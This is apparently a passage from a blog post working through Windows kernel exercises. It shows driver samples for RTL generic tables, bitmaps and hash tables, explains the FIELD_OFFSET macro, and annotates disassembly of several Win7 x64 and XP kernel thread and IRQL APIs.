<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #include <ntddk.h>
#include <string.h>
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
typedef struct _node
{
int code;
char *p;
} node;
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unload routine\n");
}
RTL_GENERIC_COMPARE_RESULTS
CompareRoutine (
__in struct _RTL_GENERIC_TABLE *Table,
__in PVOID FirstStruct,
__in PVOID SecondStruct
)
{
if(((node *)FirstStruct)->code < ((node *)SecondStruct)->code) return GenericLessThan;
if(((node *)FirstStruct)->code > ((node *)SecondStruct)->code) return GenericGreaterThan;
if(((node *)FirstStruct)->code == ((node *)SecondStruct)->code) return GenericEqual;
return 0;
}
PVOID
AllocateRoutine (
__in struct _RTL_GENERIC_TABLE *Table,
__in CLONG ByteSize
)
{
return ExAllocatePoolWithTag(NonPagedPool, ByteSize, 'tag2');
}
VOID
FreeRoutine (
__in struct _RTL_GENERIC_TABLE *Table,
__in PVOID Buffer
)
{
ExFreePoolWithTag(Buffer, 'tag2');
}
NTSTATUS
DriverEntry(
__in PDRIVER_OBJECT DriverObject,
__in PUNICODE_STRING RegistryPath
)
{
void *generic_table;
BOOLEAN success;
node *ptNode;
node entry_one;
node entry_two;
node entry_three;
RTL_BITMAP rtl_bitmap;
ULONG *bitmap_buffer;
ULONG bitmap_size = 48;
ULONG bit_index, num_bits;
DbgPrint("Driver started\n");
DriverObject->DriverUnload = &MyUnload;
entry_one.code = 1;
entry_one.p = "string one";
entry_two.code = 2;
entry_two.p = "string two";
entry_three.code = 3;
entry_three.p = "string three";
generic_table = ExAllocatePoolWithTag(NonPagedPool, sizeof(RTL_GENERIC_TABLE), 'tag1');
if(generic_table == NULL)
{
DbgPrint("Error in memory allocation\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
RtlInitializeGenericTable(generic_table, &CompareRoutine, &AllocateRoutine, &FreeRoutine, NULL);
if(RtlInsertElementGenericTable(generic_table, &entry_one, sizeof(entry_one), &success) == NULL)
{
DbgPrint("Error in first insert\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
if(RtlInsertElementGenericTable(generic_table, &entry_two, sizeof(entry_two), &success) == NULL)
{
DbgPrint("Error in second insert\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
if(RtlInsertElementGenericTable(generic_table, &entry_three, sizeof(entry_three), &success) == NULL)
{
DbgPrint("Error in third insert\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
DbgPrint("Number of elements in the table after initialization: %d\n", RtlNumberGenericTableElements(generic_table));
for (ptNode = RtlEnumerateGenericTable(generic_table, TRUE); ptNode != NULL; ptNode = RtlEnumerateGenericTable(generic_table, FALSE))
{
DbgPrint("Enumerating element: %d with string: %s \n", ptNode->code, ptNode->p);
}
if( ( ptNode = RtlLookupElementGenericTable(generic_table, &entry_two) ) != NULL)
DbgPrint("Lookup element: %d with string: %s \n", ptNode->code, ptNode->p);
else
DbgPrint("Error in lookup element \n");
if(RtlDeleteElementGenericTable(generic_table, &entry_three) == TRUE)
DbgPrint("Element three was correctly deleted!\n");
else
DbgPrint("Error in deleting element three\n");
DbgPrint("Number of elements in the table after removing element three: %d\n", RtlNumberGenericTableElements(generic_table));
if(RtlDeleteElementGenericTable(generic_table, &entry_two) == TRUE)
DbgPrint("Element two was correctly deleted!\n");
else
DbgPrint("Error in deleting element two\n");
if(RtlDeleteElementGenericTable(generic_table, &entry_one) == TRUE)
DbgPrint("Element one was correctly deleted!\n");
else
DbgPrint("Error in deleting element one\n");
if(RtlNumberGenericTableElements(generic_table) == 0)
{
DbgPrint("Table is empty and will be deallocated\n");
ExFreePoolWithTag(generic_table, 'tag1');
}
else
{
DbgPrint("Some error occurred when freeing the list\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
// bitmap
bitmap_buffer = ExAllocatePoolWithTag(NonPagedPool, 2*sizeof(ULONG), 'tag3');
if(bitmap_buffer == NULL)
{
DbgPrint("Error in memory allocation\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
RtlInitializeBitMap(&rtl_bitmap, bitmap_buffer, bitmap_size);
RtlClearAllBits(&rtl_bitmap);
DbgPrint("Number of bits set after initialization: %d\n", RtlNumberOfSetBits(&rtl_bitmap));
RtlSetBits(&rtl_bitmap, 10, 5);
num_bits = RtlFindLongestRunClear(&rtl_bitmap, &bit_index);
DbgPrint("After setting bit ten to fifteen, the longest run of clear bits is at position %d size %d\n", bit_index, num_bits);
DbgPrint("The number of clear bits is: %d\n", RtlNumberOfClearBits(&rtl_bitmap));
RtlSetBit(&rtl_bitmap, 37);
DbgPrint("Are bits from 30 to 35 clear? %d \n", RtlAreBitsClear(&rtl_bitmap, 30, 5));
DbgPrint("Are bits from 30 to 40 clear? %d \n", RtlAreBitsClear(&rtl_bitmap, 30, 10));
ExFreePoolWithTag(bitmap_buffer, 'tag3');
return STATUS_SUCCESS;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This is the output it produces:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Driver started</span><br />
<span style="font-family: Courier New, Courier, monospace;">Number of elements in the table after initialization: 3</span><br />
<span style="font-family: Courier New, Courier, monospace;">Enumerating element: 1 with string: string one </span><br />
<span style="font-family: Courier New, Courier, monospace;">Enumerating element: 2 with string: string two </span><br />
<span style="font-family: Courier New, Courier, monospace;">Enumerating element: 3 with string: string three </span><br />
<span style="font-family: Courier New, Courier, monospace;">Lookup element: 2 with string: string two </span><br />
<span style="font-family: Courier New, Courier, monospace;">Element three was correctly deleted!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Number of elements in the table after removing element three: 2</span><br />
<span style="font-family: Courier New, Courier, monospace;">Element two was correctly deleted!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Element one was correctly deleted!</span><br />
<span style="font-family: Courier New, Courier, monospace;">Table is empty and will be deallocated</span><br />
<span style="font-family: Courier New, Courier, monospace;">Number of bits set after initialization: 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">After setting bit ten to fifteen, the longest run of clear bits is at position 15 size 33</span><br />
<span style="font-family: Courier New, Courier, monospace;">The number of clear bits is: 43</span><br />
<span style="font-family: Courier New, Courier, monospace;">Are bits from 30 to 35 clear? 1 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Are bits from 30 to 40 clear? 0 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">This, instead, is an example of code that uses hash table APIs.</span><br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #include <ntddk.h>
#include <string.h>
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unload routine\n");
}
NTSTATUS
DriverEntry(
__in PDRIVER_OBJECT DriverObject,
__in PUNICODE_STRING RegistryPath
)
{
RTL_DYNAMIC_HASH_TABLE *hash_table;
RTL_DYNAMIC_HASH_TABLE_ENTRY entry1, entry2, entry3, *result_hash;
RTL_DYNAMIC_HASH_TABLE_CONTEXT context;
ULONG sig = 1234;
BOOLEAN ret_val;
DbgPrint("Driver started\n");
DriverObject->DriverUnload = &MyUnload;
hash_table = ExAllocatePoolWithTag(NonPagedPool, sizeof(RTL_DYNAMIC_HASH_TABLE), 'tag4');
if(hash_table == NULL)
{
DbgPrint("Error in memory allocation\n");
return STATUS_INSUFFICIENT_RESOURCES;
}
ret_val = RtlCreateHashTable(&hash_table, 0, 0);
DbgPrint("Create hashtable returned %08x\n", ret_val);
DbgPrint("Entry1 address: %08x Entry2 address: %08x Entry3 address: %08x\n", &entry1, &entry2, &entry3);
RtlInitHashTableContext(&context);
InitializeListHead(&(entry1.Linkage));
entry1.Signature = sig;
ret_val = RtlInsertEntryHashTable(hash_table, &entry1, (ULONG_PTR)&sig, &context);
DbgPrint("Insert hashtable 1 returned %08x\n", ret_val);
InitializeListHead(&(entry2.Linkage));
entry2.Signature = sig;
ret_val = RtlInsertEntryHashTable(hash_table, &entry2, (ULONG_PTR)&sig, &context);
DbgPrint("Insert hashtable 2 returned %08x\n", ret_val);
InitializeListHead(&(entry3.Linkage));
entry3.Signature = sig + 3;
ret_val = RtlInsertEntryHashTable(hash_table, &entry3, (ULONG_PTR)&sig, &context);
DbgPrint("Insert hashtable 3 returned %08x\n", ret_val);
result_hash = RtlLookupEntryHashTable(hash_table, (ULONG_PTR)&sig, &context);
DbgPrint("Lookup hashtable returned entry at address %08x sig: %d \n", result_hash, *(ULONG*)(result_hash->Signature) );
ret_val = RtlRemoveEntryHashTable(hash_table, &entry1, &context);
DbgPrint("Remove hashtable returned %08x\n", ret_val);
RtlDeleteHashTable(hash_table);
ExFreePoolWithTag(hash_table, 'tag4');
return STATUS_SUCCESS;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br />it produces the following output:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Driver started</span><br />
<span style="font-family: Courier New, Courier, monospace;">Create hashtable returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Entry1 address: 031667f0 Entry2 address: 03166808 Entry3 address: 03166820</span><br />
<span style="font-family: Courier New, Courier, monospace;">Insert hashtable 1 returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Insert hashtable 2 returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Insert hashtable 3 returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Lookup hashtable returned entry at address 03166820 sig: 1234 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Remove hashtable returned 00000001</span><br />
<span style="font-family: Courier New, Courier, monospace;">Unload routine</span><br />
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>8) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">FIELD_OFFSET is defined in ntdef.h as:</span><br />
<pre><span style="font-family: Courier New, Courier, monospace;">#define FIELD_OFFSET(type, field) ((LONG)(LONG_PTR)&(((type *)0)->field))</span></pre>
<pre></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The macro casts the number "0" to a pointer of type "type" (e.g. KPCR, or any other structure). Then, it considers the field "field" from this structure pointer, which translates in adding a delta (the offset of "field" in the structure) to the pointer. It uses the "&" operator to retrieve the address of the field itself, but since the pointer to the structure is 0, the whole operation simply retrieves the address 0 + Delta, that is: Delta. This value is finally cast to a pointer to long, then to long, which is the result of the macro.</span></div>
<span style="font-family: Verdana, sans-serif;">
</span>
<br />
<div>
<div>
<span style="font-family: Verdana, sans-serif;"><b>9) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Taken from Win7 x64:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ExGetCurrentProcessorCpuUsage proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rdx, gs:20h GS = KPCR, +0x020 CurrentPrcb : Ptr64 _KPRCB</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rdx+18h] rdx = KPRCB, +0x018 IdleThread : Ptr64 _KTHREAD</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>r8d, [rdx+4708h] rdx = KPRCB, +0x4708 UserTime</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>add<span class="Apple-tab-span" style="white-space: pre;"> </span>r8d, [rdx+4704h] rdx = KPRCB, +0x4704 KernelTime</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, [rax+284h] rax = KTHREAD, +0x284 KernelTime (of idle thread)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>xor<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>imul<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 64h KTHREAD.KernelTime * 100 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>div<span class="Apple-tab-span" style="white-space: pre;"> </span>r8 divided by KPRCB.UserTime + KPRCB.KernelTime</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, 64h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>sub<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, eax subtract the result of the division from 100</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>[rcx], edx store result in [rcx]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ExGetCurrentProcessorCpuUsage endp</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This function calculates the percentage of CPU usage time by using the following formula:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> x = (ETHREAD.KernelTime * 100) / (KPRCB.UserTime + KPRCB.KernelTime)</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">which can be derived from a simple proportion:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> (KPRCB.UserTime + KPRCB.KernelTime) : 100 = ETHREAD.KernelTime : x</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> <i>total cpu usage time idle thread usage time</i></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">if x is the percentage of time the CPU spent in the idle thread, the returned value is 100 - x (time spent outside idle, that is: time during which the CPU was busy).</span></div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The XP x86 version works in a similar way.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="font-family: Verdana, sans-serif;">
<b>10) </b><br />
<br />
Taken from Win7 x64:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">KeGetCurrentIrql proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, cr8</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">KeGetCurrentIrql endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The api simply gets the current IRQL from register CR8, which on x64 is a shadow register for the Task Priority Register (TPR) from the LAPIC chip.</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
The same api taken from Xp x86 shows a slightly different implementation:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">hal!KeGetCurrentIrql:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12e8 a18000feff mov eax,dword ptr ds:[<b>FFFE0080h</b>]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12ed c1e804 shr eax,4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12f0 0fb68088c06d80 movzx eax,byte ptr hal!HalpVectorToIRQL (806dc088)[eax]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806d12f7 c3 ret</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
In this system (as in most systems), the LAPIC data is mapped at address 0xFFFE0000, and offset 0x80 contains the TPR. The api gets the value of such register, which is normally just a byte, discards the lowest 4 bits, and uses the remaining ones as an index into the HalpVectorToIRQL array. Basically, it translates the hardware TPR to a software IRQL. As a test, I can use the debugger to see the value of the TPR:</div>
</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> dd FFFE0080</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">fffe0080 <b>000000d1 </b>00000000 000000d1 00000000</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
Removing the lowest 4 bits, the remaining number is 0x0D, which can be used as an index in the HalpVectorToIRQL array:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> db HalpVectorToIRQL </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">806dc088 00 ff ff 01 02 ff 05 06-07 08 09 0a 1b <b>1c </b>1d 1e </span></div>
</div>
</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
Thus the current IRQL is 0x1C (CLOCK2_LEVEL).</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div>
<div style="font-family: Verdana, sans-serif;">
<b>11) </b><br />
<br />
Taken from Win7 x64:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PEPROCESS IoThreadToProcess(_In_ PETHREAD Thread);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>IoThreadToProcess</b> proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+210h] ETHREAD.Tcb.Process (pointer to EPROCESS)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">IoThreadToProcess endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api returns the pointer to EPROCESS that is stored in the ETHREAD whose pointer is passed as an argument.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetThreadProcessId</b> proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+3B8h] ETHREAD.Cid.UniqueProcess</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetThreadProcessId endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api returns the PID stored in the ETHREAD whose pointer is passed as an argument.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">BOOLEAN PsIsSystemThread(_In_ PETHREAD Thread);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsIsSystemThread </b>proc near<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, [rcx+4Ch] ETHREAD.Tcb.MiscFlags (contains several flags)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>shr<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, 0Dh 0d = 13 = SystemThread : Pos 13, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>and<span class="Apple-tab-span" style="white-space: pre;"> </span>al, 1</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsIsSystemThread endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
This api accesses the MiscFlags field of the KTHREAD structure from the ETHREAD whose pointer is passed as an argument. This field is in the form of a bitfield and contains the following bits/flags:</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c KernelStackResident : Pos 0, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ReadyTransition : Pos 1, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ProcessReadyQueue : Pos 2, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c WaitNext : Pos 3, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c SystemAffinityActive : Pos 4, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c Alertable : Pos 5, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c GdiFlushActive : Pos 6, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c UserStackWalkActive : Pos 7, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ApcInterruptRequest : Pos 8, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c ForceDeferSchedule : Pos 9, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c QuantumEndMigrate : Pos 10, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c UmsDirectedSwitchEnable : Pos 11, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c TimerActive : Pos 12, 1 Bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> <b>+0x04c SystemThread : Pos 13, 1 Bit</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c Reserved : Pos 14, 18 Bits</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> +0x04c MiscFlags : Int4B</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
Thus, the flag at position 13 is the one being returned, it corresponds to the "SystemThread" flag.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">HANDLE PsGetCurrentThreadId(void);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadId </b>proc near<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread (pointer to ETHREAD)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+3C0h] CurrentThread.UniqueThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadId endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api gets the pointer to the current ETHREAD from the KPCR structure, from which it returns the TID.</div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The next apis are similar to this one.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadPreviousMode </b>proc near </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>al, [rax+1F6h] CurrentThread.PreviousMode</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadPreviousMode endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadProcessId </b>proc near </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+3B8h] CurrentThread.Cid.UniqueProcess</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadProcessId endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadStackBase </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+278h] CurrentThread.StackBase</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadStackBase endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
-----</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
